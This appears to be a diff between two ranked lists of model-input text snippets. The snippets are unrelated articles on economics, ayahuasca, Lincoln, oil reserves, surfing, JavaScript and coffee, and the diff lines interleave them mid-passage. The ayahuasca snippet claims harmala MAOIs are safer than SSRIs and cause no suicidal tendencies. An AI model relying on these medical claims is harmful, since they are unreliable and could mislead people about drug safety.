month needed to offset the 125,000 new entrants to the job market due to population growth and to erode the 8 million people laid off in the past year alone. Meanwhile, house prices continue to fall and credit continues to contract. With retail sales dropping in June and the Leading Economic Index (LEI) standing at minus 7.7 per cent, it should be clear that the US economy is heading back towards recession, following a temporary distortion created by some $1.3 trillion in federal stimulus. In short, the stimulus has failed. -The government said it needed to redirect the $4.5bn towards domestic infrastructure. The cut was from projected expenditure – with the aid budget continuing to grow in line with inflation. +While there can be no doubt that an increase in government spending will result in a boost to GDP figures, the evidence of history shows that such growth is short-lived. Unfortunately as leaders around the world look to tighten the reins on out of control spending, President Obama and his Democratic supporters in Congress believe that their stimulus actions have succeeded and should be redoubled. Armed with nothing more than faith in government and a belief that spending is both a means and an end, it appears that the US stimulus policy will continue. The net result of these efforts will not be a more vibrant economy, but the perpetuation of fear and confusion in the business community and the continuing expansion of deficits that will lead inevitably to higher taxes. -“Under the previous Labor government, the rapid growth in Australia’s aid budget was neither targeted nor sustainable... This year’s aid expenditure will be $107m less than last year. From 2014-15 the $5bn aid budget will grow each year in line with the consumer price index,” Bishop said in a statement on Saturday, “confirming” the cuts after they were announced in the Australian newspaper. +The more indebted an economy becomes, the greater the burden that must be borne by the wealth-creating private sector. Indeed, at the present rate of government debt-financing, the private sector will have to contribute some $2 trillion each year in interest costs alone. This money must be raised by taxation or inflation. -She said the government would now consult NGOs +This week, in response to their fears of increased regulations, higher taxes, and greater government stewardship of the economy, discontent among business leaders flared into the open. Gathering in Washington, leaders of the US Chamber of Commerce lashed out at current regulatory changes in healthcare. In other forums, business executives and investors questioned the efficacy of the ================================================================================ -Rank = 65; Score = 700416.0 -<|begin_of_text|>WASHINGTON (Reuters) - Add another economic worry to inflation and deflation: ecoflation, the rising cost of doing business in a world with a changing climate. - -Ecoflation could hit consumer goods hard in the next five to 10 years, according to a report by World Resources Institute and A.T. Kearney, a global management consulting firm. - -Companies that make fast-moving consumer goods, everything from cereal to shampoo, could see earnings drop by 13 percent to 31 percent by 2013 and 19 percent to 47 percent by 2018 if they do not adopt sustainable environmental practices, the report said. +Rank = 66; Score = 339968.0 +<|begin_of_text|>B.caapi contains harmine, harmaline, and tetrahydroharmine, all of which are both beta-carboline harmala alkaloids and Monoamine oxidase inhibitors (MAOIs). The MAOIs in B. caapi allow the primary psychoactive compound, DMT (which is introduced from the other primary ingredient in ayahausca, the Psychotria viridis plant), to be orally active. -The costs of global warming are showing up now in the form of worse heat waves, droughts, wildfires and possibly more severe tropical storms but they are not yet reflected in consumer prices, said the institute’s Andrew Aulisi after the report’s December 2 release. +The name ayahuasca means "vine of the soul"and the shamans of the indigenous western Amazonian tribes use the plant in religious and healing ceremonies. In addition to its hallucinogenic properties, caapi is used for its healing properties as a purgative, effectively cleansing the body of parasites and helping the digestive tract. -Instead, these costs are paid by governments and society, Aulisi said in a telephone interview. That could change if President-elect Barack Obama and the U.S. Congress push for a system that puts a price on the emission of climate-warming carbon dioxide, Aulisi said. +Harmala alkaloids are short term yet powerful MAOIs which render tryptamines orally active by temporarily reducing levels of monoamine oxidase in the body which otherwise rapidly destroys them. Their effects are more powerful and less toxic than pharmaceutical SSRIs since they do not lead to suicidal tendencies and other side effects which detrimentally affect human behavior. -This is unlikely to happen next year in time for a December 2009 deadline to craft an international pact to fight climate change but it is more likely to happen in 2010. +The principal ayahuasca compounds have a common indole structure which, through several mechanisms, influences certain functions of the central nervous system (CNS). The relevant factor is the biochemical similarity of these compounds to the neurotransmitter serotonin (5-HT). The harmala alkaloids in ayahuasca, primarily harmine and tetrahydroharmine, reversibly inhibit the neuronal enzyme monoamine oxidase (MAO). -These rising costs and possible tightening regulation of greenhouse gas emissions are not necessarily a bad thing, he said. +This allows DMT to be active when ingested orally. It also facilitates accumulation of biogenic amines, such as 5-HT, which are normally metabolized by monoamine oxidase enzymes. DMT is a naturally-occurring biochemical substance secreted by the human body in the pineal gland. It occurs in hundreds of plant species worldwide. It can produce very powerful visionary effects when smoked in its pure form or taken orally in Ayahuasca. -“The message we don’t see in this study is that regulation is going to cost... a lot of money,” Aulisi said. “We think the analysis is a catalyst to convince companies to take greater action on these important issues.” +The Ayahuasca Experience -LESS PLASTIC +People who have consumed ayahuasca report having spiritual revelations regarding their purpose on earth, the true nature of the universe as well as deep insight into how to be the best person they possibly can. This is viewed by many as a spiritual awakening and what is often described as a rebirth. In addition it is often reported that individuals can gain access to higher spiritual dimensions and make contact with various spiritual or extra dimensional beings who can act as guides or healers. -In fact, some companies are already looking at ways to cut their emissions in advance of any new regulation, said Daniel Mahler of A.T. Kearney. +Wild cats including Jaguars looking for a high will seek out +================================================================================ +Rank = 67; Score = 339968.0 +<|begin_of_text|>These capitalists generally act harmoniously and in concert, to fleece the people. -One example is consumer giant Procter & Gamble, which has a team looking across the company’s varied laundry, hair-care and health-care businesses to see how they can use less plastic, a fossil-based material, Mahler said by telephone. +—Abraham Lincoln, from his first speech as an Illinois state legislator, 1837 -But the changes may need to go deeper and wider, he said, spreading to the basics of how supply chains are managed. +Everyone now is more or less a Socialist. -For instance, companies that presumed U.S. transportation costs would be low and U.S. labor costs would be high had their goods made in countries where employees would work for less. But a new cost to the carbon emitted by long-distance transport could change that equation, making foreign manufacturing less attractive, -================================================================================ -Rank = 66; Score = 692224.0 -<|begin_of_text|>By Kyle Orton (@KyleWOrton) on February 17, 2017 +—Charles Dana, managing editor of the New York Tribune, and Lincoln’s assistant secretary of war, 1848 -Four days ago, Chapo Trap House, a Left-wing politics and humour podcast, hosted Brace Belden, known to Twitter as “PissPigGranddad,” a 27-year-old from San Francisco who has joined the Syrian Kurdish militia, the People’s Protection Units (YPG). It was very interesting and informative on the state of play in northern Syria. +The workingmen of Europe feel sure that, as the American War of Independence initiated a new era of ascendancy for the middle class, so the American Antislavery War will do for the working classes. They consider it an earnest of the epoch to come that it fell to the lot of Abraham Lincoln, the single-minded son of the working class, to lead his country through the matchless struggle for the rescue of an enchained race and the reconstruction of a social world. -The YPG is run by the Democratic Union Party (PYD) front of the Kurdistan Workers’ Party (PKK). The most amusing part of the interview is Belden’s formal maintenance that the YPG, while fraternal comrades to the PKK and admirers of their ideology, have absolutely no organizational links at all, while at the same time letting the audience in on the fact that the YPG and indeed the Syrian Democratic Forces (SDF) coalition that it controls are parts of the PKK structure. Belden describes joining the YPG by first linking up with the PKK at its headquarters in the Qandil Mountains in northern Iraq, before being spirited across the border into Syria. +—Karl Marx and the First International Workingmen’s Association to Lincoln, 1864 -Belden gives a very interesting glimpse of the YPG’s method of governance. The YPG calls its rule “libertarian socialism,” says Belden, but it’s “pretty much a Stalinist state”. Belden describes the ascetic nature of the true believers in the PKK’s ideology—of which he, clearly, is not one—and the collectivized nature of life. Among other things, everyone is subjected to struggle sessions of the kind associated with Mao or the Khmer Rouge. +ON DECEMBER 3, 1861, a former one-term congressman, who had spent most of the past dozen years studying dissident economic theories, mounting challenges to the existing political order and proposing ever more radical responses to the American crisis, delivered his first State of the Union address as the sixteenth president of the United States. -The foreign fighters that join the YPG were, initially, “psychopaths that wanted to come kill people,” says Belden, but the YPG expelled these people once it realized what they were and has now refined its recruitment model to bring in a flow of hard-Left Westerners. +Since assuming office eight months earlier, this new president had struggled, without success, first to restore the severed bonds of the Union and then to avert a wrenching civil war. Now, eleven southern slave states were in open and violent rebellion against the government he led. -Belden says he believes the Americans will abandon the YPG in favour of Turkey and that he believes it will be Turkey and her allies that go to Raqqa to evict the Islamic State. Belden favours this outcome, believing it would be a “bloodbath” if the YPG tries to take Raqqa City. Belden concludes though that there will soon be a peace agreement between the pro-regime coalition, Turkey, and the YPG—and that after that the Turks will attack the YPG in Efrin and elsewhere. Belden says that the YPG retains the ability to strike back +His inaugural address of the previous spring had closed with a poignant reflection on the prospect of eventual peace, imagining a day when the Union might again be touched “by the better angels of our nature.” But, now, in the last month of what Walt Whitman would recall as America’s “sad, distracted year”—“Year that suddenly sang by the mouths of the round-lipp’d cannons”—the better angels seemed to have deserted the continent. Every effort to restore the republic had been thwarted. There was no room for accommodation with the Confederate States of America. Fort Sumter had been fired upon and the flag of southern rebellion now flew above Charleston Harbor. Virginia, the cradle of presidents, the state of Washington, Jefferson and Madison, had joined the revolt and assembled a capital of the Confederacy less than 100 miles from Washington. Hundreds of Union and Confederate soldiers had died, with thousands more wounded at the First Battle of Bull Run. Armies had been reorganized and generals replaced with the recognition that this was no skirm ================================================================================ -Rank = 67; Score = 692224.0 -<|begin_of_text|>This post will mark the beginning of a series on Steve Keen’s book Debunking Economics. My first impression after reading his book was that it was chalk full of great ideas and solid criticisms of “neoclassical” economics as it is currently taught to undergraduate and graduate students. I’m not always fond of Keen’s tone, but isn’t some crank. I’m writing these posts in order to better retain the ideas and concepts expressed in the book, as well as to spark discussion. Other bloggers have also written about and summarized this book, and I will be linking to these posts as well. I’ll say that I don’t really have anything new to add to what has been perviously said, and I am doing this for my benefit. +Rank = 68; Score = 339968.0 +<|begin_of_text|>The International Energy Association (IEA) announced a plan today to make 60 million barrels of oil available to the market over the next month from the Strategic Petroleum Reserve (SPR), in response to the disturbance in supplies from Libya. Half of this oil is to come from the SPR of the United States; the rest is to come from SPRs of other members of OECD. -Keen’s begins his criticism of neoclassical (micro) economics in chapter 3, which centers around the “Law of Demand”, i.e. the idea that market demand curves don’t necessarily slope downwards. This is in direct contrast to what is taught in an “Intro to Microeconomics” course, and subsequent economic courses use the assumption when explaining other concepts. +Both the amount and the timing of the release are strange. The amount of the release is equivalent to 2 million barrels a day. This is actually more than the Libyan disruption took off the market, which was about 1.4 million barrels a day. The disruption first took place in February, and oil prices have been declining since early May, so the timing is strange, as well. -Market Demand Curves Don’t Slope Downwards +What the timing of the oil release is close to, is the end of Quantitative Easing 2 (QE2). QE2 is the United States’ program of buying back debt to keep interest rates low and the dollar low, which began November 2010 and is scheduled to end June 30, 2011. It was intended to stimulate the economy, and oil prices have indeed risen during most of the time it was in effect. -Economists look at demand curves to see how demand for a commodity changes as its price changes, while the consumer’s income remains constant. When you don’t make that assumption, things get complicated quickly. The decrease of price in one good raises the real income of the consumer (the income effect), allowing the consumer to increase the consumption of all goods, not just the good that has become cheaper. So in the case of Giffen Goods, because the rise in price of one good make another good unaffordable, you have a paradox where demand increases as prices rise. Consider necessary, luxury, and normal goods, and you have a very complicated picture and some interesting looking demand curves. +Today’s announcement of the SPR oil-release program was made by IEA, but a person can’t help but wonder if the United States wasn’t heavily involved in the decision. After all, the United States is the largest member of the IEA, and is making half the release itself. Also, when Ben Bernanke spoke yesterday, he didn’t have any financial replacement for QE2. The release of oil from the SPR looks as if it is the latest attempt to kick-start the economy, both of the US and other OECD countries, using yet another approach. -This is why economists make the distinction between the income effect and the substitution effect (if price falls, consumption rises and vice versa). The substitution effect is always negative and it’s what economists use to establish the “Law of Demand”. However, the income effect can be both negative and positive. So economists neutralize the income effect by using a Hicksian compensated demand function. The consumer is given a level of utility and a set of prices. The consumer then minimizes the amount of money that he/she would need to spend to achieve that given level of utility, thus separating the income effect and the substitution effect. +If we look at oil price and the S&P 500 Index (Figure 2), there has been a significant correlation between the two since late 2008. When oil prices drop, so does the S&P 500 Index, most likely since this means the economy is “tanking.” When oil prices rise, so does the S&P 500 Index, indicating the economy is working well. -But once you introduce more than one agent into +The problem is that high oil prices soon sow the seed of their own destruction. Once the oil price starts getting high (over $85 is high, over $110 is very high), the high oil prices start causing recessionary influences, because citizens have to cut back on other goods, when oil and food prices start rising. Oil and food prices usually rise and fall ================================================================================ -Rank = 68; Score = 692224.0 -<|begin_of_text|>WASHINGTON (Reuters) - Texan Sam Lovett had no health insurance in August 2010 when an emergency hospital stay brought the news from his doctors that his liver was failing and he could die within less than a year without a transplant. - -The small distribution center where he worked did not provide health insurance. Lovett, 43, who lives near Comfort, Texas, was not able to buy private coverage on his own because of his already bad health. Though he had the resources to cover routine medical bills, he now needed a $400,000 organ transplant and no doctor or clinic would take him without insurance. +Rank = 69; Score = 337920.0 +<|begin_of_text|>“Waves are not measured in feet and inches; they are measured in increments of fear.” —Buzzy Trent -“They were making arrangements to send me to a hospice. One doctor flatly told me that I had a better chance of leaving the hospital dead than alive,” said Lovett, who had a history of alcoholism and obesity. - -But in the months that followed, Lovett was able to enroll in the Pre-Existing Condition Insurance Plan (PCIP). The program was created by the healthcare law that President Barack Obama, a Democrat, signed in March 2010 despite the united opposition of Republicans in Congress. The program paid for Lovett’s transplant surgery at the Mayo Clinic in Phoenix last December. - -PCIP is a temporary government program set up to run until 2014, when the Obama healthcare law is due to take full effect and prevent insurance companies from the common practice of denying people coverage due to pre-existing medical conditions. About 60,000 Americans already are receiving medical coverage through the program, according to the Obama administration. +* * * -As the U.S. Supreme Court prepares to rule in the next few weeks on whether to overturn the law considered to be Obama’s signature domestic policy achievement, Lovett said the choice is very clear for him and others unable to get insurance without the statute’s provisions. +A little before 10 a.m. on the morning of December 4, Peter Davi drove his Ford F-150 along the 17 Mile Drive in Carmel-by-the-Sea, a quaint town bordering Monterey in Northern California. His friend Osh Bartlett, known as Frog, sat beside him. Through the window they smelled the pine and cut grass wafting from the farms and gentlemen’s ranches up in Carmel Valley. Davi watched with a flicker of disdain as a parade of Audis, Lexuses, and the occasional Ferrari sped past. As the other drivers stopped to buy skim lattes at Carmel Valley Coffee, Davi and Frog passed the Pebble Beach Golf Links, turned right onto Cypress Drive, and pulled into the parking lot at Still­water Cove—already filled with pickups hitched to empty waverunner trailers. -“Without this, you’re going to die,” Lovett said in an interview arranged by the Consumers Union organization, which supports the law. “From my perspective, that’s what the Supreme Court will sanction, or not - whether people will be allowed to die because they can’t get insurance.” +Outside it was cool and misty—mid-50s and rising. A 10-knot breeze blew out of the north, swirling the loose, dark curls on Davi’s head. Tourists come thousands of miles to eye this stretch of picturesque coast, with its rocky shoreline and lush cypress trees. But to Davi, a lifelong local, it was the sound that struck him that morning. In the parking lot at Stillwater Cove he could hear Ghost Tree like he’d never heard it before. It was the sound of 70-foot waves—surely record size—detonating onto the boulder field at Pescadero Point. -Unlike people in many other rich nations where health insurance is near universal, many Americans struggle without medical coverage even as the country pays more for healthcare than anywhere else in the world. The U.S. healthcare system is a patchwork of private insurance and restrictive government programs that has left tens of millions uninsured. +Davi was a massive, intimidating man. Considered the unofficial mayor of this legendary surfing community, he’d earned widespread respect over the years among elite surfers by launching himself into the largest, most terrifying waves in California and Hawaii. He knew every break in Big Sur. He had a ruddy, wind-swept face and dulled dark eyes. He stood 6'2" and weighed close to 250 pounds. When he pulled a 4/3-millimeter wet suit over his body, along with a hood and gloves, his paunch was visible. He grabbed his 8'5" surfboard—a “gun” suitable for paddle surfing but too long for this dangerous tow-in scene. At 45 he walked as if in constant pain, as though the cartilage in his knees had been worn away. -Many Americans receive health insurance only because their employers provide it as a job benefit. But some companies, particularly smaller employers, do not offer it. +This morning Davi was feeling ================================================================================ -Rank = 69; Score = 688128.0 +Rank = 70; Score = 335872.0 <|begin_of_text|>The secret to silky smooth JavaScript animation! Creating an animation in JavaScript is one of the simplest things you can do. If you’ve ever tried to do it, you’ll most likely have used either the setTimeout or setInterval functions. @@ -1535,359 +1540,374 @@ OK, you’ve done this a million times before. What’s wrong with this picture? Secondly, setTimeout only updates the screen when it wants to, not when the computer is able to. That means your poor browser has to juggle redrawing the animation whilst redrawing the whole screen ================================================================================ -Rank = 70; Score = 684032.0 -<|begin_of_text|>Typical weather conditions in an Icelandic winter - -The climate of Iceland is subarctic (Köppen climate classification: Cfc)[1] near the southern coastal area and tundra inland in the highlands. The island lies in the path of the North Atlantic Current, which makes its climate more temperate than would be expected for its latitude just south of the Arctic Circle. This effect is aided by the Irminger Current, which also helps to moderate the island’s temperature.[2] The weather in Iceland can be notoriously variable.[3] +Rank = 71; Score = 333824.0 +<|begin_of_text|>WASHINGTON (Reuters) - Add another economic worry to inflation and deflation: ecoflation, the rising cost of doing business in a world with a changing climate. -The aurora borealis is often visible at night time during the winter. The midnight sun can be experienced in summer on the island of Grimsey off the north coast; the remainder of the country, since it lies just south of the polar circle, experiences a twilight period during which the sun sets briefly, but still has around 2 weeks of continuous daylight during the summer. +Ecoflation could hit consumer goods hard in the next five to 10 years, according to a report by World Resources Institute and A.T. Kearney, a global management consulting firm. -Seasons [ edit ] +Companies that make fast-moving consumer goods, everything from cereal to shampoo, could see earnings drop by 13 percent to 31 percent by 2013 and 19 percent to 47 percent by 2018 if they do not adopt sustainable environmental practices, the report said. -Winters [ edit ] +The costs of global warming are showing up now in the form of worse heat waves, droughts, wildfires and possibly more severe tropical storms but they are not yet reflected in consumer prices, said the institute’s Andrew Aulisi after the report’s December 2 release. -The Icelandic winter is relatively mild for its latitude, owing to maritime influence, and enhanced by its proximity to warm currents of the North Atlantic Gyre. The southerly lowlands of the island average around 0 °C (32 °F) in winter, while the Highlands of Iceland tend to average around −10 °C (14 °F). The lowest temperatures in the northern part of the island range from around −25 to −30 °C (−13 to −22 °F). The lowest temperature on record is −39.7 °C (−39.5 °F).[4] +Instead, these costs are paid by governments and society, Aulisi said in a telephone interview. That could change if President-elect Barack Obama and the U.S. Congress push for a system that puts a price on the emission of climate-warming carbon dioxide, Aulisi said. -Summers [ edit ] +This is unlikely to happen next year in time for a December 2009 deadline to craft an international pact to fight climate change but it is more likely to happen in 2010. -The average July temperature in the southern part of the island is 10–13 °C (50–55 °F). Warm summer days can reach 20–25 °C (68–77 °F).[4] The highest temperature recorded was 30.5 °C (86.9 °F) at the Eastern fjords in 1939. Annual average sunshine hours in Reykjavík are around 1300, which is similar to towns in Scotland and Ireland.[5] +These rising costs and possible tightening regulation of greenhouse gas emissions are not necessarily a bad thing, he said. -Climate data for Reykjavík, Iceland (1961–1990) Month Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec Year Average high °C (°F) 1.9 +“The message we don’t see in this study is that regulation is going to cost... a lot of money,” Aulisi said. “We think the analysis is a catalyst to convince companies to take greater action on these important issues.” -(35.4) 2.8 +LESS PLASTIC -(37.0) 3.2 +In fact, some companies are already looking at ways to cut their emissions in advance of any new regulation, said Daniel Mahler of A.T. Kearney. -(37.8) 5.7 +One example is consumer giant Procter & Gamble, which has a team looking across the company’s varied laundry, hair-care and health-care businesses to see how they can use less plastic, a fossil-based material, Mahler said by telephone. -(42.3) 9.4 +But the changes may need to go deeper and wider, he said, spreading to the basics of how supply chains are managed. -(48.9) -================================================================================ -Rank = 71; Score = 684032.0 -<|begin_of_text|>By Indiaspend As many as 45 of India’s top 50 districts that offer affordable, formal financial services are in four south Indian states—with 30 concentrated in Tamil Nadu and Kerala—according to CRISIL Inclusix, a measure of financial inclusion. The top five states/union territories are Puducherry, Kerala, Tamil Nadu, Goa and Chandigarh. These states drove a surge in India’s financial inclusion index, which improved to 50.1 (of a possible 100) at the end of 2013 from 42.8 at the end of 2012. The index does not take into account the Prime Minister’s Jan Dhan Yojana (People’s Wealth Scheme). With over 140 million new bank accounts opened since August 2014, the index will likely be boosted further in 2015. CRISIL, a Mumbai-based ratings agency, defines financial inclusion as “the extent of access by all sections of society to formal financial services such as credit, deposit, insurance and pension services”. CRISIL’s Inclusix is a relative index that combines three parameters of basic financial services—branch penetration, deposit penetration and credit penetration. A score of 100 indicates the ideal state for each of the three parameters. CRISIL has included district-wise data from micro-finance institutions (MFIs) to calculate the index for the first time, covering 652 districts in 35 states and union territories. Bank Services Are Spreading As many as 117 million savings bank accounts were opened in the financial year 2013, almost 50% more than the 79 million that opened the previous year. The total operative bank accounts in the country at the end of 2013 were 820 million as against 703 million in 2012, an increase of 17%, the fastest growth in four years. However, growth in credit accounts declined due to a reduction in small-borrower accounts to 102 million in 2013 from 109 million in 2012. “The decline was primarily observed in five metro districts: Delhi, Kolkata, Mumbai, Mumbai Suburban and Bangalore Urban. This could be attributed to book-cleaning exercises by banks and closure of dormant credit-card accounts,” the report said. South leads; North-East at bottom but moves ahead With an increase of 40% in bank credit accounts, the northern state of Jammu & Kashmir saw its Inclusix score improve to 45.2. The state also saw high deposit and branch scores +For instance, companies that presumed U.S. transportation costs would be low and U.S. labor costs would be high had their goods made in countries where employees would work for less. But a new cost to the carbon emitted by long-distance transport could change that equation, making foreign manufacturing less attractive, ================================================================================ -Rank = 72; Score = 679936.0 -<|begin_of_text|>The time is ripe for a rediscovery of Leopold Kohr. Or perhaps better: the time is ripe for the discovery of Leopold Kohr, since few have any idea who he was. A select group of readers might connect him with E.F. Schumaker, author of Small Is Beautiful: Economics as if People Mattered (orig. 1973). Kohr was one of Schumaker’s instructors, and the two remained lifelong associates and friends. +Rank = 72; Score = 331776.0 +<|begin_of_text|>Credit supply and the housing boom -I. +Alejandro Justiniano, Giorgio Primiceri, Andrea Tambalotti -Roughly three years after the Meltdown of 2008 I encountered an article online with the curious title, “This Economic Crisis is a “Crisis of Bigness.” It attracted my attention, because like many other observers I’d become convinced long before that both government and corporations had grown too large to accomplish even well-intentioned goals. The impulses for a more centralized society and a more economically integrated world — the impulses, that is, that bring about “bigness” — were mistakes from the get-go. Globalization promised universal prosperity, but instead has made the rich richer, slowly and painfully begun wiping out the American middle class, and created legions of unemployed or underemployed poor people — precariat is the term some writers are now using for this new class. The precariat consists of the army of adjunct faculty, temps, short-term contract workers, etc., most doing what they are doing because it is the only work they can find in the globalized “new economy.” The underemployment crisis heralds eventual civil unrest, especially with the Bureau of Labor Statistics insisting, against all experience, that the unemployment rate is just 5.5% (the U-3 figure as of this writing). Does anyone really think this is good, whether for workers or the economy at large? +There is no consensus among economists on the forces that drove the historical rise of US house prices and household debt that preceded the Global Crisis. In this column, the authors argue that the fundamental factor behind that boom was an increase in the supply of mortgage credit. This rise was brought about by the diffusion of securitisation and shadow banking, and by a surge in foreign capital inflows. The finding is based on a straightforward interpretation of four key macroeconomic developments between 2000 and 2006, provided by a simple general equilibrium model of housing and credit. -The above article cited Leopold Kohr, on the grounds that he had predicted central aspects of the present situation over half a century ago in his magnum opus The Breakdown of Nations (1957). I immediately ordered Kohr’s book, and when it came, I put every spare minute into reading it straight through. It is not light reading. Works that raise fundamental issues in political philosophy as well as economics never are. I wondered why I’d never heard of Kohr or Breakdown before. Then I realized: unlike someone such as Joseph Schumpeter, whose analysis of the long-term fate of capitalism as an industrial system in Capitalism, Socialism and Democracy (1947) was the most interesting I’d -================================================================================ -Rank = 73; Score = 679936.0 -<|begin_of_text|>“Home life ceases to be free and beautiful as soon as it is founded on borrowing and debt” Henrik Ibsen +The Global Crisis precipitated the worst US recession since the Great Depression. The spectacular rise in house prices and household debt during the first half of the 2000s, which is illustrated in Figures 1 and 2, was a crucial factor behind these events. Yet, economists disagree on the fundamental causes of this credit and housing boom. -According to Oxford Dictionary the term Slave is defined as “a person who is the legal property of another and is forced to obey them” as in the case of the United States during the 18th and 19th centuries where slavery was a legalized institution. Oxford dictionary also defines slavery as “a person who works very hard without proper remuneration or appreciation” as in today’s world of a person working for a company or corporation where their efforts are usually under appreciated. It also describes a slave as “a person who is excessively dependent upon or controlled by something” or “a device, or part of one, directly controlled by another”. Debt can be an instrument used to control an individual or a nation for that matter. In this case, an individual is dependent upon “Credit” to buy products. +Figure 1. Real house prices -Then the credit becomes a debt that has to be repaid. It becomes a “control mechanism” as the creditor becomes the “Slave Owner” and the debtor becomes the “Slave”. What is the point? In today’s world of unlimited credit, consumers become modern-day slaves to their creditors. What is the difference between slavery in 18th century America with imported African slaves and the America of 2013? There is no difference besides the physical abuse of the African slaves by their owners. In America, consumers suffer psychological abuse by its creditors. As long as an individual remains in debt bondage, that person will have to repay that debt until the day that person literally dies in most cases. +Notes: FHFA is the all-transactions house price index from the Federal Housing and Financing Agency. CoreLogic is the repeated sales national house price index produced by CoreLogic. Both indexes are deflated by the headline consumer price index, and normalized to 100 in 2000Q1. -Black Friday is the day that starts the most important holiday for big name retailers and Wall Street speculators and that is Christmas. It is the shopping season that investors, economists and corporations pay close attention to as they measure consumer confidence and the profits they reap from consumer spending. Major retailers and corporations such as Wal-Mart expect to make profits. Wall Street expects consumers to spend on Black Friday through the Christmas holidays following the Federal Reserve’s continued policies of Quantitative Easing (QE). Economists across the spectrum predict that the new Federal Reserve chairwoman Janet Yellen will continue to buy US bonds indefinitely continuing Ben Bernanke’s current policies. +Figure 2. Household mortgages-to-GDP ratio -All the while consumers continue to accumulate debt. Black Friday was marked with chaos followed by violence as mobs of consumers’ raided shopping centers and malls for discounts and sales on numerous products including flat screen televisions, toys, clothing and other goods they most likely don’t need. Regardless of the economic +Notes: Household mortgages are nominal home mortgages from the balance sheet of households and nonprofit organizations in the Flow of Funds. GDP is in current prices from the NIPA tables. + +The higher loan-to-value ratio hypothesis + +The most common narrative in the macroeconomic literature attributes the surge in debt and house prices to a progressive loosening of collateral requirements for mortgage borrowers, such as those brought about by the diffusion of mortgages with higher initial loan-to-value (LTV) ratios, of multiple mortgages on the same property, and of home equity lines of credit. + +Several recent papers use quantitative general equilibrium models to explore the implications of these less stringent collateral requirements for house prices and other macroeconomic outcomes (e.g. Favilukis et al. 2013, Bianchi et al. 2012, Boz and Mendoza 2014, Garriga et al. 2012). In all of these models, a collateral constraint limits households' ability to borrow to a fraction of the value of their real estate. When this maximum loan-to-value ratio is relaxed, households can increase their leverage and borrow more. As a result, the demand ================================================================================ -Rank = 74; Score = 675840.0 -<|begin_of_text|>Show full PR text +Rank = 73; Score = 329728.0 +<|begin_of_text|>Making coffee to drink -Consumer Reports Auto Reliability Survey: Ford Continues Fall While Seven Japanese Brands Top List +For the agricultural and industrial processes for producing whole coffee beans, see Coffee processing -Audi and Cadillac make major jumps in rankings +Filter coffee being brewed -December 2012 CoverYONKERS, NY-A perfect storm of reliability problems has dropped Ford to next to last among the 28 car brands ranked in Consumer Reports 2012 Annual Auto Reliability Survey, while its luxury brand, Lincoln, placed just a notch higher. The findings were released today before the Automotive Press Association in Detroit. +Coffee preparation is the process of turning coffee beans into a beverage. While the particular steps vary with the type of coffee and with the raw materials, the process includes four basic steps: raw coffee beans must be roasted, the roasted coffee beans must then be ground, the ground coffee must then be mixed with hot water for a certain time (brewed), and finally the liquid coffee must be separated from the used grounds. -Only two years ago, Ford was Detroit's poster child for reliability. It cracked the top 10 among brands in Consumer Reports predicted-reliability scores, with more than 90 percent of its models being average or better. This year the top seven spots are all held by Japanese brands. +Coffee is usually brewed immediately before drinking. In most areas, coffee may be purchased unprocessed, or already roasted, or already roasted and ground. Coffee is often vacuum packed to prevent oxidation and lengthen its shelf life. -"Ford's bumpy road can be seen in the numbers. Sixty percent of Ford-branded models and half of Lincolns were below average in predicted reliability, and none placed above average," said Jake Fisher, director of automotive testing for Consumer Reports. +Roasting [ edit ] -Several factors contributed to Ford's decline in Consumer Reports' reliability rankings. A few new or redesigned models, including the Explorer, Fiesta, and Focus, came out of the gate with more problems than normal. Ford has also added the MyFord/MyLincoln Touch electronic infotainment system, which has been problematic so far, to many vehicles. In addition, three historically reliable models-the Ford Escape, Fusion and the Lincoln MKZ-are not included in the analysis; the three were redesigned for 2013 and CR doesn't yet have reliability data on them. +Dutch coffee-roasting machine, c. 1920 -Toyota, on the other hand, has excelled in Consumer Reports' latest ratings. Its three brands-Scion, Toyota, and Lexus-swept the top spots. Toyota is clearly setting the pace in reliability. Of the 27 models in the brand's lineup, 16 earned the highest rating. The subcompact Toyota Prius C earned Consumer Reports' top score overall. The hatchback Prius, the larger Prius V, and the new Prius plug-in were also above average. +Roasting coffee transforms the chemical and physical properties of green coffee beans. When roasted, the green coffee bean expands to nearly double its original size, changing in color and density. As the bean absorbs heat, its color shifts to yellow, then to a light "cinnamon" brown, and then to a rich dark brown color. During roasting, oils appear on the surface of the bean. The roast will continue to darken until it is removed from the heat source. -The Toyota trio was followed by four other Japanese makes: Mazda, Subaru, Honda, and Acura, in that order. All of the models produced by the top seven brands had average or better reliability. And of the 90 Japanese models reflected in Consumer Reports' brand comparison, 86 were average or better, with 35 earning the highest rating. +Coffee can be roasted with ordinary kitchen equipment (frying pan, grill, oven, popcorn popper) or by specialised appliances. A coffee roaster is a special pan or apparatus suitable to heat up and roast green coffee beans. -Leading the Europeans, Audi had its best showing ever, moving up -================================================================================ -Rank = 75; Score = 675840.0 -<|begin_of_text|>"California is once again the sixth-largest economy in the world. If you add the GDP’s of Washington and Oregon, California would surpass the United Kingdom to become the fifth-largest economy in the world." +Grinding [ edit ] -Antonio Villaraigosa, the former mayor of Los Angeles and 2018 Democratic candidate for California governor, recently called for the state to unite with like-minded cities and states on the West Coast to oppose "dangerous policies advanced by a Trump administration." +An old-fashioned manual burr-mill coffee grinder -California’s large economy, Villaraigosa said in a Dec. 8, 2016 op-ed in the Sacramento Bee, gives it leverage in any possible showdown. +Wheel coffee grinder -In making this call, Villaraigosa repeated a favorite claim by California politicians that the state’s economy ranks as the sixth largest in the world -- a claim PolitiFact California rated Mostly True in July. He then took the economic comparison further -- all the way to the Pacific Northwest. +Coffee grinder -"California is once again the sixth-largest economy in the world," Villaraigosa said. "If you add the GDP’s of Washington and Oregon, California would surpass the United Kingdom to become the fifth-largest economy in the world." +The whole coffee beans are ground, also known as milling, to facilitate the brewing process. -"That’s power – power we must use to protect our people against any dangerous policies advanced by a Trump administration," he added. +The fineness of the grind strongly affects brewing. Brewing methods that expose coffee grounds to heated water for longer require a coarser grind than faster brewing methods. Beans that are too finely ground for the brewing method in which they are used will expose too much surface area to the heated water and produce a bitter, harsh, "over-extracted" taste. At the other extreme, an overly coarse grind will produce weak coffee unless more is used. Due to the importance of a grind's fineness, a uniform grind is highly desirable. -We decided to fact-check the part of Villaraigosa’s claim that if the GDPs of California, Washington and Oregon were somehow combined, they’d represent the fifth largest economy on the planet, ahead of the United Kingdom. +If a brewing method is used in which the time of exposure of the ground coffee to the heated water is adjustable, then a short brewing time can be used for finely ground coffee. This produces coffee of equal flavor yet uses less ground coffee. A blade grinder does not 